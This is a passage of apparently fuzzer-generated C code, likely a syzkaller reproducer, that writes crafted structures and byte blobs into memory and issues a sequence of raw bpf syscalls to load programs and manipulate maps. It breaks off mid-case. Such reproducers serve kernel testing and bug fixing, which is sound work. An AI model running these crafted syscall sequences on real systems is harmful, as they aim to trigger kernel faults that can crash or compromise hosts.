"\xa1\xfb\x36\x54\xdd\xf2\x91\xec\xb7\x76\x8a\xc1\xe1\x77\x04\x2c\xb4" "\xc4\x52\xfa\x6b\x39\x66\x95\x00\x00\x00\x00\x00\x00\x00\x00\xc1\x87" "\xda\x23\xd6\x85\x55\x00\xfe\x85\x10\xb5\x1e\x13\xa8\x90\xe3\x94\xb8" "\x4a\x6e\xa2\xcc\x8d\x42\xb9\x7c\x69\x7c\x29\x12\x22\x98\xd5\x5e\x2e" "\x1c\xca\x8e\x07\xab\xda\x26\x06\xa3\xf3\x81\xc6\x4b\x9f\xec\x00\x00" "\x00\x0a\x79\x65\xe4\x85\x4e\x25\x21\x32\x86\x0c\x9a\xf1\xbd\x5f\xe2" "\x63\xc0\x31\x3d\xea\x5d\x6e\x0c\x11\xa4\x66\xd6\x89\x2e\xd6\x5f\x34" "\x66\x7d\xd7\x9b\x07\xb5\xcb\xdd\x8a\xa7\xdd\x56\x1a\x26\xb5\x56\x2d" "\x48\x61\xa7\xe1\xb0\xf4\x89\x30\xe0\xb6\x96\xea\x3b\xee\x7e\xb7\x27" "\x94\xe1\x63\xd7\xae\xac\x9a\x0f\xa5\x40\x3a\xc9\xcb\x42\x1e\xae\x28" "\x3b\x05\x50\xf1\xd0\xd3\x39\xcd\x7b\x96\xe7\x1d\x3a\xb4\x8a\xd9\xd7" 
"\x97\x5e\x0c\x9b\x11\x7f\x71\xd3\xab\x80\xa0\xc9\xb0\x28\x4e\xcc\x46" "\x9f\xa6\x18\x1c\x9c\x71\xfc\xe0\x7a\x6f\xfb\x23\x29\x6a\x10\x77\x63" "\x13\x8e\x8d\x98\x76\x29\x1a\xf2\x07\x68\x90\xc4\x79\x25\xac\x77\x3d" "\x95\xd2\xca\x42\xac\xb3\xe5\xf3\xa1\x55\x06\x65\xb8\x98\x46\x2c\x13" "\x9f\xfd\x01\x06\xbc\x8a\x61\xb6\x11\x7d\x25\x2e\xfc\xab\x71\x06\xb4" "\xc3\xa3\xc1\x3a\x70\xff\x45\x2e\x9d\x20\x96\x14\x2c\x51\x7b\x0e\x91" "\xb5\xcf\x88\x33\x2f\xac\xa5\xb3\xee\x96\x36\x30\x65\xc3\xce\x32\xd3" "\xd3\x9e\xc3\x6e\x20\xd5\x97\xe0\x56\x64\xf2\x52\x6b\xd9\x18\x09\x06" "\x49\xda\x11\xf7\x29\x97\x89\xd0\x0f\x50\x24\xdf\x1e\x99\xd3\xef\xec" "\xb9\xb4\x57\x64\x2f\xe8\x10\x37\x0b\xa4\xfb\xe0\x0f\xa6\x0a\x28\xaf" "\x96\x6a\x27\xa1\x65\x9e\x44\x8b\xbe\x43\xa1\xdc\xd2\xea\x76\x00\x18" "\xb5\x7a\x36\xac\x41\xef\x20\x51\xa7\xb7\x03\xd5\x5c\x06\x02\x54\x06" "\x63\x01\x6e\x20\xd5\x03\x85\x76\x6d\xf4\xda\xc4\x78\x02\xa5\x5b\xd3" "\x8d\xd7\x67\xee\x99\x60\xc6\xda\xa7\x04\xfc\x5d\x01\xa1\x45\x91\x34" "\xd1\xb9\xed\xfd\xe3\xbe\x9e\x25\xa1\x10\x22\x8c\x64\x25\x35\x88\xff" "\x42\x06\x44\xdb\xc0\x85\x4e\x69\xa7\xbd\xda\x72\xf9\x3c\xea\xcc\xf9" "\x2c\xfe\x7d\xd6\x29\x6c\x95\x0d\xb1\x12\x66\xf7\x0c\x2a\x1f\x0f\x6d" "\xd8\xa5\xef\x9b\x73\xcf\x6a\x12\xa1\xba\x16\xfd\xc7\xe3\x5b\x80\x5f" "\x4f\xd2\xfc\xff\x0a\x62\x37\x22\x14\x9c\x14\x65\xe4\xde\x2d\x53\xf0" "\xf1\x0b\x14\xc2\x18\x65\x02\x7a\xbc\x71\xa1\x2c\xb1\xe9\xf8\x02\x9c" "\x7a\x20\x00\x00\x00\xee\xb0\xd5\x3a\x83\xe5\x18\xc8\xd2\x05\x2c\x08" "\xb5\x15\xd9\xd0\xbd\xe2\x4a\xc4\xe7\x98\x04\x0c\x7d\xb0\xbb\x03\xc0" "\x19\x50\x7d\x63\x77\xf3\xd5\xdd\x94\xa2\x7a\xbc\x6d\x6b\x12\x0d\x61" "\xf7\x72\x40\x7e\x0d\x2c\xb5\x0d\x29\x16\x8b\x68\xae\xf9\xf1\x76\xb4" "\xc3\xaa\x8b\x21\x27\x9d\x4e\xa9\xc1\xf6\x69\xaa\x8c\x2c\x17\xd5\xb3" "\xa8\xd1\xdd\xa5\x8d\x26\xf1\x01\x9a\xf0\x4b\x77\x74\xc8\x5d\x5b\xce" "\x8b\xe0\x10\xf2\x7c\x52\x11\x93\x80\x31\xc3\x40\x46\x80\xb0\x12\x79" "\xc7\x78\xbd\x1f\xe1\xb4\x8c\x4b\x5b\x8e\x0f\xe7\x56\xe5\x4a\x8d\x76" 
"\xb7\xce\xc5\xe3\x40\x7d\x93\xb4\xea\xdc\x44\x64\x40\x60\x7d\xe8\x44" "\xac\xf5\x52\x4a\x46\x57\xe3\x3a\xf2\x11\x55\x47\xb7\x35\xb5\x7b\x50" "\x92\xd0\xbc\x8f\xa6\xac\xb8\x32\x50\x9a\xbe\x08\x82\xd5\x70\xce\x40" "\x0a\xae\xbd\x7b\xaf\xf8\x85\x26\x60\x8d\x69\x91\xaa\xc9\x57\x51\x67" "\x11\x74\x12\x94\x57\xe4\xa0\x3a\xca\x69\xd8\x2b\x64\xb8\x9e\x6a\xd6" "\xed\x1e\x27\x5e\xc5\x00\x2e\x48\x17\x0e\x4c\x7b\x4f\x39\x71\x48\x10" "\x98\xde\xdb\x88\xfb\xa9\x07\x70\xe4\x4b\xf4\x04\xd5\xa9\x7f\xef\xe2" "\xfe\x8e\x45\x9f\xe4\x59\x33\xb7\x8c\x7a\xb5\xfe\x98\x5a\x48\x01\x93" "\xa2\x0f\xb0\x7d\xa1\x45\x5f\xb2\x83\xdf\x68\xaf\x56\x9a\xc8\x2a\xa6" "\xdc\x70\x3e\x29\xbf\x15\x89\x31\xfb\x79\xf2\xab\xfa\x6f\xf7\xeb\x8c" "\x4f\x38\x1c\x9d\xa5\x8b\xea\x46\x0e\x2e\xad\x96\x99\x33\xe5\x39\x19" "\x70\xca\x4f\xdd\xd6\x4d\xa2\xe5\xdf\x9c\x4d\x82\x04\x40\x68\xca\xaa" "\xab\x77\x1b\x37\xbb\x06\xbb\xe6\x73\x05\x6d\x84\x98\x25\x52\x5f\x11" "\x20\xb2\x25\x0f\xc4\x85\x20\x38\x1f\x7a\x74\xb1\xc6\x87\x78\x1c\xb6" "\xb2\x3e\x67\xb9\x18\x84\x4b\x83\xdb\xae\xeb\x55\x9e\xc8\x52\x0d\x71" "\x0d\xd6\xd6\xb4\xe6\x48\x38\xbd\x43\x4a\x7f\x7f\xce\xff\x9a\x7b\xc2" "\xcc\x57\x10\x32\xff\xbc\x9f\x8c\xe9\x70\x41\xe1\xbc\x47\x29\xd5\x39" "\x35\x8d\xc9\x59\x9c\x12\x66\xb9\xce\x2c\xb6\xdd\x0a\xd5\x7a\x6e\x9d" "\x3d\x4a\x11\xa2\x7f\x70\xb2\x93\x4c\x96\x23\x7e\x2b\xa0\x9c\x58\xee" "\xda\x67\x8d\x4d\x08\xb6\xda\x99\xb7\xa8\x6e\x94\x62\x15\xaf\xb1\xb4" "\x87\x92\xfd\xe5\x44\x92\xe3\x06\xcb\x53\x42\xe2\x58\x98\x74\xb6\x03" "\xa1\xde\x97\x2b\x1f\x09\xcc\x35\x00\x96\xf5\xc3\xe8\x14\x11\x8a\xf9" "\xba\x07\x93\xcf\xdf\x20\xc7\x7b\x34\xea\xcf\xdf\x63\xce\x59\xec\x4d" "\x2f\x86\x7b\xf8\x84\xe9\x41\x55\x9b\x06\x8d\x90\x83\x25\x66\x76\x72" "\xb5\xe1\xcf\x71\xf4\x82\x9c\x04\x93\xe8\xb1\x41\x48\x9e\xd9\x26\xb8" "\x22\xbe\xce\xad\x7a\x0a\x2b\x4a\x4c\x00\x8a\xb1\x6b\x61\x6d\x60\xf3" "\x47\xe4\xda\x54\xf0\x64\x43\x50\x7e\xfe\x57\xea\x62\x39\x9e\xf4\xeb" "\x11\xb2\xf5\x59\xe1\xb0\x56\x45\x6a\x53\x99\x8b\xf1\xc6\xd1\x3c\x92" 
"\xe7\x51\x36\x14\x7f\x91\xae\xcf\x02\x00\x00\xeb\x1b\x51\xbf\x70\x0b" "\x3c\x0b\xf5\x4b\xc3\x74\x5f\xf3\x13\xc5\xe7\x5d\xc6\x63\x86\x89\x7f" "\x6e\xe4\x54\x29\x37\x1b\x8d\x08\x78\xc4\x42\xad\x2f\xe9\xba\xf8\x5c" "\x13\x90\xda\x13\xef\xc3\x53\xcc\xbe\xf9\x50\xc2\x9f\x39\xdd\xf4\x36" "\xf0\xd9\xbf\x1b\xe1\x51\x5e\xd2\x51\xd8\xb6\xf1\x1e\xcb\x16\xb1\xe8" "\xd1\xed\x04\x19\x6e\x9b\x6c\x2f\x9e\x06\x8b\x77\x49\xbb\x6c\x1f\x53" "\x3e\x49\x3f\x22\xc9\x01\x66\x2c\x65\xcb\x76\x1d\xc2\xee\xff\x2f\x69" "\x8b\xd4\xdb\xae\x83\xe2\xdf\xdc\x4f\x1c\x7f\x91\x8a\x00\x51\x5c\x1b" "\xc1\x89\xd1\x0e\xc2\x2b\x35\xc9\x27\x25\xcb\xf0\xba\x24\x4f\xd0\x29" "\xc4\xf0\x26\xf6\x8e\x00\x00\x00\x06\x00\x00\xab\x04\x76\xc3\xfd\x7f" "\x7c\x1e\x5c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\xe4\x3e" "\x39\xd3\xf4\x39\x4f\xbf\xa1\x3c\x41\x6b\x1c\x44\x3c\x5e\x52\xee\xa7" "\x26\x49\x1a\xd7\x51\x00\xeb\xad\x7c\x6d\x5a\x66\x5c\x59\xa3\xfb\x15" "\x8e\x43\xda\x90\x4f\x19\xe7\xe8\xda\xa4\xe9\x03\x90\xb8\xda\x94\x5f" "\x6c\xd7\x85\x36\xc0\xd2\xbe\x07\x22\x1f\x85\xad\x46\xb1\x80\xf2\x56" "\xd4\xd8\x45\x92\x81\x1d\x15\xd6\x58\x96\xb6\x6b\x63\xa4\x67\x05\x33" "\x8b\x67\xb7\x2d\xc1\xc3\x07\x5f\xcd\xc5\xcb\xff\xb0\x36\x61\x51\x63" "\x2b\xa5\xbe\x8a\xe8\x15\xdf\xea\x9f\xad\xfd\x31\xc4\x73\xa2\x4a\x73" "\xd3\xe5\x11\x6c\x30\x23\xb3\x56\x3c\x72\xd2\x6f\xbd\x59\x87\x71\x32" "\xbd\xe5\xca\x4e\xf8\xd9\x2f\xd3\x61\x3c\x76\x8b\x35\x22\x3f\x6f\xd0" "\xb5\xe9\xa8\xb9\x8c\xcc\xf1\xe2\xb4\x61\x2e\x62\x0e\x3a\x15\x9d\x63" "\x65\xc9\x04\x5a\xaa\x82\x6a\xa0\xee\x6d\x26\xcf\x03\x97\xce\x67\x4c" "\x20\x82\x45\x84\xb4\x64\xeb\xdc\x2f\x3e\xa2\x6a\x7a\xec\x45\x70\xb2" "\x42\xa6\x67\x7a\x4e\x91\x87\xf8\x59\x1c\x3a\x9b\xdc\x14\xa3\x1a\xe7" "\xc0\x34\xbb\x19\xda\x84\x5d\xe6\x9d\x13\x00\xe4\xa8\xb6\xe3\x45\xc2" "\xe3\x1c\xdf\x12\x7f\x77\x10\x2e\xf0\xe5\x76\xed\x1f\xf4\x13\x35\x99" "\x88\x2c\x14\x94\x35\x58\x73\x7d\xa0\xed\x24\x66\x03\xd7\x68\x93\x3b" "\x36\xd8\xf8\xdf\x3a\xdd\x2e\x17\xce\x64\x43\x47\xc4\x19\xa7\x79\x5b" 
"\x63\x08\xd4\x45\x5d\xc6\x80\xbe\x6e\xe2\xee\x7f\xae\x76\x12\x92\xd6" "\x72\x49\xba\xed\xbd\x6c\x03\xec\x95\xdc\x09\x66\xcc\xdb\x31\x9a\xaa" "\x9f\x8a\x35\xb2\x4c\xc7\xb7\xc9\xc4\x79\x34\xa2\x61\xae\xff\x83\x1d" "\xc5\x2d\x9e\x54\xfe\x0d\x54\x64\x1b\x41\x32\x98\x43\x24\x27\xea\xba" "\x26\x5f\x3e\xcb\xff\xbd\x3b\x84\x65\xf1\xac\xf2\x07\x3e\xdb\x06\xf6" "\x52\x41\x74\x49\x09\xea\xd7\x45\xc6\x8b\x26\x08\x03\xe7\x36\x9b\xea" "\xbb\x27\x40\xe5\x5e\x48\x45\x0c\x9c\x33\x99\xcb\x70\x43\x44\x63\xc4" "\x5f\x55\xe4\xfc\x8a\xe7\x37\xfd\x70\x2b\xb4\x6d\x6c\x10\x5d\x9d\xba" "\x8a\x6e\x64\x31\x6a\x26\xd7\xc4\xc7\xca\x5d\x03\x3a\x34\x13\x60\xe2" "\xc5\x0f\x8b\x27\xb2\x85\x62", 3883); *(uint64_t*)0x20000290 = 0x20000040; memcpy((void*)0x20000040, "GPL\000", 4); *(uint32_t*)0x20000298 = 4; *(uint32_t*)0x2000029c = 0x1076; *(uint64_t*)0x200002a0 = 0x20000300; *(uint32_t*)0x200002a8 = 0; *(uint32_t*)0x200002ac = 0; memset((void*)0x200002b0, 0, 16); *(uint32_t*)0x200002c0 = 0; *(uint32_t*)0x200002c4 = 0; *(uint32_t*)0x200002c8 = -1; *(uint32_t*)0x200002cc = 8; *(uint64_t*)0x200002d0 = 0; *(uint32_t*)0x200002d8 = 0; *(uint32_t*)0x200002dc = 0x10; *(uint64_t*)0x200002e0 = 0; *(uint32_t*)0x200002e8 = 0; *(uint32_t*)0x200002ec = 0; *(uint32_t*)0x200002f0 = -1; *(uint32_t*)0x200002f4 = 0; *(uint64_t*)0x200002f8 = 0; *(uint64_t*)0x20000300 = 0; *(uint32_t*)0x20000308 = 0x10; *(uint32_t*)0x2000030c = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000280ul, /*size=*/0x70ul); if (res != -1) r[2] = res; break; case 8: *(uint32_t*)0x20001380 = r[2]; *(uint32_t*)0x20001384 = 0xfe; *(uint64_t*)0x20001388 = 0x20000480; *(uint32_t*)0x200004b4 = 0xffffff3c; *(uint64_t*)0x200004b8 = 0; *(uint32_t*)0x200004e8 = 0; *(uint32_t*)0x200004ec = 0; *(uint64_t*)0x200004f0 = 0; *(uint64_t*)0x200004f8 = 0; *(uint32_t*)0x20000504 = 8; *(uint64_t*)0x20000508 = 0; *(uint32_t*)0x20000510 = 0; *(uint32_t*)0x20000514 = 0; *(uint64_t*)0x20000518 = 0; *(uint64_t*)0x20000520 = 0; *(uint32_t*)0x20000528 = 0; 
*(uint32_t*)0x2000052c = 0x10; *(uint32_t*)0x20000530 = 8; *(uint32_t*)0x20000534 = 0; *(uint64_t*)0x20000538 = 0; res = syscall(__NR_bpf, /*cmd=*/0xful, /*arg=*/0x20001380ul, /*size=*/0x10ul); if (res != -1) r[3] = *(uint32_t*)0x20000484; break; case 9: *(uint32_t*)0x20000380 = 2; *(uint32_t*)0x20000384 = 4; *(uint32_t*)0x20000388 = 8; *(uint32_t*)0x2000038c = 1; *(uint32_t*)0x20000390 = 0x80; *(uint32_t*)0x20000394 = -1; *(uint32_t*)0x20000398 = 0x1ab9; memset((void*)0x2000039c, 0, 16); *(uint32_t*)0x200003ac = 0; *(uint32_t*)0x200003b0 = -1; *(uint32_t*)0x200003b4 = 3; *(uint32_t*)0x200003b8 = 1; *(uint32_t*)0x200003bc = 5; *(uint64_t*)0x200003c0 = 0; syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x20000380ul, /*size=*/0x48ul); break; case 10: *(uint32_t*)0x20000980 = 4; *(uint32_t*)0x20000984 = 0x16; *(uint64_t*)0x20000988 = 0x20000780; *(uint8_t*)0x20000780 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x20000781, 0, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000781, 0, 4, 4); *(uint16_t*)0x20000782 = 0; *(uint32_t*)0x20000784 = 0x3ff; *(uint8_t*)0x20000788 = 0; *(uint8_t*)0x20000789 = 0; *(uint16_t*)0x2000078a = 0; *(uint32_t*)0x2000078c = 0x9c5; *(uint8_t*)0x20000790 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x20000791, 1, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000791, 1, 4, 4); *(uint16_t*)0x20000792 = 0; *(uint32_t*)0x20000794 = -1; *(uint8_t*)0x20000798 = 0; *(uint8_t*)0x20000799 = 0; *(uint16_t*)0x2000079a = 0; *(uint32_t*)0x2000079c = 0; STORE_BY_BITMASK(uint8_t, , 0x200007a0, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007a0, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x200007a0, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x200007a1, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007a1, 0, 4, 4); *(uint16_t*)0x200007a2 = 0; *(uint32_t*)0x200007a4 = 0; *(uint8_t*)0x200007a8 = 0x85; *(uint8_t*)0x200007a9 = 0; *(uint16_t*)0x200007aa = 0; *(uint32_t*)0x200007ac = 0x86; STORE_BY_BITMASK(uint8_t, , 0x200007b0, 5, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007b0, 1, 3, 1); STORE_BY_BITMASK(uint8_t, , 
0x200007b0, 0xd, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x200007b1, 7, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007b1, 0xa, 4, 4); *(uint16_t*)0x200007b2 = 0xfffc; *(uint32_t*)0x200007b4 = 4; *(uint8_t*)0x200007b8 = 0x85; STORE_BY_BITMASK(uint8_t, , 0x200007b9, 0, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007b9, 1, 4, 4); *(uint16_t*)0x200007ba = 0; *(uint32_t*)0x200007bc = 7; *(uint8_t*)0x200007c0 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x200007c1, 3, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007c1, 1, 4, 4); *(uint16_t*)0x200007c2 = 0; *(uint32_t*)0x200007c4 = -1; *(uint8_t*)0x200007c8 = 0; *(uint8_t*)0x200007c9 = 0; *(uint16_t*)0x200007ca = 0; *(uint32_t*)0x200007cc = 0; *(uint8_t*)0x200007d0 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x200007d1, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007d1, 3, 4, 4); *(uint16_t*)0x200007d2 = 0; *(uint32_t*)0x200007d4 = 2; *(uint8_t*)0x200007d8 = 0; *(uint8_t*)0x200007d9 = 0; *(uint16_t*)0x200007da = 0; *(uint32_t*)0x200007dc = 0; *(uint8_t*)0x200007e0 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x200007e1, 1, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007e1, 1, 4, 4); *(uint16_t*)0x200007e2 = 0; *(uint32_t*)0x200007e4 = -1; *(uint8_t*)0x200007e8 = 0; *(uint8_t*)0x200007e9 = 0; *(uint16_t*)0x200007ea = 0; *(uint32_t*)0x200007ec = 0; STORE_BY_BITMASK(uint8_t, , 0x200007f0, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007f0, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x200007f0, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x200007f1, 8, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007f1, 0, 4, 4); *(uint16_t*)0x200007f2 = 0; *(uint32_t*)0x200007f4 = -1; STORE_BY_BITMASK(uint8_t, , 0x200007f8, 3, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x200007f8, 3, 3, 2); STORE_BY_BITMASK(uint8_t, , 0x200007f8, 3, 5, 3); STORE_BY_BITMASK(uint8_t, , 0x200007f9, 0xa, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x200007f9, 8, 4, 4); *(uint16_t*)0x200007fa = 0xfff8; *(uint32_t*)0x200007fc = 0; STORE_BY_BITMASK(uint8_t, , 0x20000800, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000800, 1, 3, 1); 
STORE_BY_BITMASK(uint8_t, , 0x20000800, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000801, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000801, 0xa, 4, 4); *(uint16_t*)0x20000802 = 0; *(uint32_t*)0x20000804 = 0; STORE_BY_BITMASK(uint8_t, , 0x20000808, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000808, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000808, 0, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000809, 2, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000809, 0, 4, 4); *(uint16_t*)0x2000080a = 0; *(uint32_t*)0x2000080c = 0xfffffff8; STORE_BY_BITMASK(uint8_t, , 0x20000810, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000810, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000810, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000811, 3, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000811, 0, 4, 4); *(uint16_t*)0x20000812 = 0; *(uint32_t*)0x20000814 = 8; STORE_BY_BITMASK(uint8_t, , 0x20000818, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000818, 0, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000818, 0xb, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000819, 4, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000819, 0, 4, 4); *(uint16_t*)0x2000081a = 0; *(uint32_t*)0x2000081c = 1; *(uint8_t*)0x20000820 = 0x85; *(uint8_t*)0x20000821 = 0; *(uint16_t*)0x20000822 = 0; *(uint32_t*)0x20000824 = 0x82; *(uint8_t*)0x20000828 = 0x95; *(uint8_t*)0x20000829 = 0; *(uint16_t*)0x2000082a = 0; *(uint32_t*)0x2000082c = 0; *(uint64_t*)0x20000990 = 0x20000840; memcpy((void*)0x20000840, "GPL\000", 4); *(uint32_t*)0x20000998 = 0x7fffffff; *(uint32_t*)0x2000099c = 0; *(uint64_t*)0x200009a0 = 0; *(uint32_t*)0x200009a8 = 0x41000; *(uint32_t*)0x200009ac = 3; memset((void*)0x200009b0, 0, 16); *(uint32_t*)0x200009c0 = 0; *(uint32_t*)0x200009c4 = 9; *(uint32_t*)0x200009c8 = -1; *(uint32_t*)0x200009cc = 8; *(uint64_t*)0x200009d0 = 0x20000900; *(uint32_t*)0x20000900 = 3; *(uint32_t*)0x20000904 = 3; *(uint32_t*)0x200009d8 = 8; *(uint32_t*)0x200009dc = 0x10; *(uint64_t*)0x200009e0 = 0; *(uint32_t*)0x200009e8 = 0; *(uint32_t*)0x200009ec = 0; 
*(uint32_t*)0x200009f0 = -1; *(uint32_t*)0x200009f4 = 1; *(uint64_t*)0x200009f8 = 0; *(uint64_t*)0x20000a00 = 0x20000940; *(uint32_t*)0x20000940 = 3; *(uint32_t*)0x20000944 = 2; *(uint32_t*)0x20000948 = 0xd; *(uint32_t*)0x2000094c = 0xa; *(uint32_t*)0x20000a08 = 0x10; *(uint32_t*)0x20000a0c = 0x3ff; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000980ul, /*size=*/0x90ul); if (res != -1) r[4] = res; break; case 11: *(uint32_t*)0x20000a40 = -1; *(uint32_t*)0x20000a44 = -1; *(uint32_t*)0x20000a48 = 0x36; *(uint32_t*)0x20000a4c = 0x2000; *(uint32_t*)0x20000a50 = 0; *(uint32_t*)0x20000a54 = r[4]; *(uint64_t*)0x20000a58 = 0; syscall(__NR_bpf, /*cmd=*/9ul, /*arg=*/0x20000a40ul, /*size=*/0x20ul); break; case 12: *(uint32_t*)0x20000a80 = 2; *(uint32_t*)0x20000a84 = 4; *(uint32_t*)0x20000a88 = 8; *(uint32_t*)0x20000a8c = 1; *(uint32_t*)0x20000a90 = 0x80; *(uint32_t*)0x20000a94 = -1; *(uint32_t*)0x20000a98 = 6; memset((void*)0x20000a9c, 0, 16); *(uint32_t*)0x20000aac = 0; *(uint32_t*)0x20000ab0 = -1; *(uint32_t*)0x20000ab4 = 3; *(uint32_t*)0x20000ab8 = 2; *(uint32_t*)0x20000abc = 0; *(uint64_t*)0x20000ac0 = 0; res = syscall(__NR_bpf, /*cmd=*/0ul, /*arg=*/0x20000a80ul, /*size=*/0x48ul); if (res != -1) r[5] = res; break; case 13: *(uint32_t*)0x20000c40 = r[5]; *(uint64_t*)0x20000c48 = 0x20000b00; memcpy( (void*)0x20000b00, "\x9d\x72\x15\xbf\x2b\x10\x16\x44\xad\x6e\xa9\x00\x26\x81\xe9\x1d\xec" "\xab\x2c\x07\x99\x19\xb2\x27\xb8\x3f\x7a\xf7\x4e\xd0\x68\x30\x59\x34" "\x74\x38\x40\x4e\x01\x1b\x4a\xcf\xf8\x73\x2a\x54\xdf\x53\xac\x81\x47" "\x47\x81\xa7\xa3\xb9\x43\xc8\x1e\xf2\xc7\x74\x54\xf2\x9a\x1e\x49\x59" "\xef\xd5\x65\xae\x13\x65\xcd\x4d\xf2\xe4\xfb\x86\x94\x20\x67\x72\x02" "\x2f\x2f\x7e\xbe\x94\x03\x96\x62\x7a\x5b\x2a\x09\x9a\xe1\xae\x15\xf2" "\x21\x36\xe9\x87\x02\x43\xd6\xa4\x29\x37\x78\x1b\xa7\x77\xf8\x3f\x41" "\x9b\x98\x63\x9a\x69\x98\xa9\x63\xf6\x26\xee\x78\x69\x38\x3e\xe2\x1d" "\xcc\x36\x3f\xc8\xc6\x28\xd3\xd0\x1b\xfb\x89\x4d\x94\xda\xd6\x1a\xd9" 
"\x46\x8b\x4c\x15\x76\x12\x6c\xca\x0f\xaf\xd2\xee\x50\xf6\x1d\x3a\x38" "\x83\x51\x76\x3f\x47\x03\x03\xec\x4d\x61\x42\x24\xc6\x8a\xca\x94\xa6" "\xf9\xe4\x3d\x75\x52\xb5\xd8\x7b", 195); *(uint64_t*)0x20000c50 = 0x20000c00; *(uint64_t*)0x20000c58 = 4; syscall(__NR_bpf, /*cmd=*/1ul, /*arg=*/0x20000c40ul, /*size=*/0x20ul); break; case 14: *(uint32_t*)0x20000d40 = 0; res = syscall(__NR_bpf, /*cmd=*/0xdul, /*arg=*/0x20000d40ul, /*size=*/4ul); if (res != -1) r[6] = res; break; case 15: *(uint32_t*)0x20000f40 = 6; *(uint32_t*)0x20000f44 = 3; *(uint64_t*)0x20000f48 = 0x20000dc0; STORE_BY_BITMASK(uint8_t, , 0x20000dc0, 7, 0, 3); STORE_BY_BITMASK(uint8_t, , 0x20000dc0, 1, 3, 1); STORE_BY_BITMASK(uint8_t, , 0x20000dc0, 3, 4, 4); STORE_BY_BITMASK(uint8_t, , 0x20000dc1, 4, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000dc1, 3, 4, 4); *(uint16_t*)0x20000dc2 = 0xfff0; *(uint32_t*)0x20000dc4 = 0x10; *(uint8_t*)0x20000dc8 = 0x18; STORE_BY_BITMASK(uint8_t, , 0x20000dc9, 6, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000dc9, 3, 4, 4); *(uint16_t*)0x20000dca = 0; *(uint32_t*)0x20000dcc = 4; *(uint8_t*)0x20000dd0 = 0; *(uint8_t*)0x20000dd1 = 0; *(uint16_t*)0x20000dd2 = 0; *(uint32_t*)0x20000dd4 = 0; *(uint64_t*)0x20000f50 = 0x20000e00; memcpy((void*)0x20000e00, "syzkaller\000", 10); *(uint32_t*)0x20000f58 = 0; *(uint32_t*)0x20000f5c = 0x17; *(uint64_t*)0x20000f60 = 0x20000e40; *(uint32_t*)0x20000f68 = 0x100; *(uint32_t*)0x20000f6c = 0x71; memset((void*)0x20000f70, 0, 16); *(uint32_t*)0x20000f80 = 0; *(uint32_t*)0x20000f84 = 0x25; *(uint32_t*)0x20000f88 = -1; *(uint32_t*)0x20000f8c = 8; *(uint64_t*)0x20000f90 = 0; *(uint32_t*)0x20000f98 = 0; *(uint32_t*)0x20000f9c = 0x10; *(uint64_t*)0x20000fa0 = 0x20000e80; *(uint32_t*)0x20000e80 = 4; *(uint32_t*)0x20000e84 = 0xb; *(uint32_t*)0x20000e88 = 9; *(uint32_t*)0x20000e8c = 0x10001; *(uint32_t*)0x20000fa8 = 0x10; *(uint32_t*)0x20000fac = 0; *(uint32_t*)0x20000fb0 = 0; *(uint32_t*)0x20000fb4 = 2; *(uint64_t*)0x20000fb8 = 0x20000ec0; *(uint32_t*)0x20000ec0 
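= -1;
    *(uint32_t*)0x20000ec4 = -1;
    *(uint32_t*)0x20000ec8 = r[5];
    *(uint64_t*)0x20000fc0 = 0x20000f00;
    *(uint32_t*)0x20000f00 = 0;
    *(uint32_t*)0x20000f04 = 2;
    *(uint32_t*)0x20000f08 = 7;
    *(uint32_t*)0x20000f0c = 6;
    *(uint32_t*)0x20000f10 = 5;
    *(uint32_t*)0x20000f14 = 5;
    *(uint32_t*)0x20000f18 = 0xb;
    *(uint32_t*)0x20000f1c = 1;
    *(uint32_t*)0x20000fc8 = 0x10;
    *(uint32_t*)0x20000fcc = 0x18;
    res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000f40ul, /*size=*/0x90ul);
    if (res != -1)
      r[7] = res;
    break;
  case 16:
    syscall(__NR_bpf, /*cmd=*/0x10ul, /*arg=*/0ul, /*size=*/0ul);
    break;
  case 17:
    *(uint32_t*)0x20001180 = 1;
    *(uint32_t*)0x20001184 = r[7];
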